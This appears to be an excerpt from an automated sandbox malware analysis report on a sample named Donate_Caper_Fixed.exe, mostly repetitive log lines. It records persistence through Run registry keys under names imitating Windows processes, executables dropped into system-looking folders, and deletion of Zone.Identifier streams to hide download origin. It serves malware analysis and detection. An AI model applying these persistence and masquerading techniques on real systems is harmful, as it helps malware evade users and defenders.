Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HxTsr	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HxTsr	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HxTsr	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HxTsr	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File opened: C:\Windows\AppReadiness\audiodg.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File opened: C:\Windows\System32\d3d9on12\msiexec.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File opened: C:\Windows\System32\wlanapi\UsoClient.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File opened: C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File opened: C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File opened: C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\AppReadiness\audiodg.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Process information set: NOOPENFILEERRORBOX
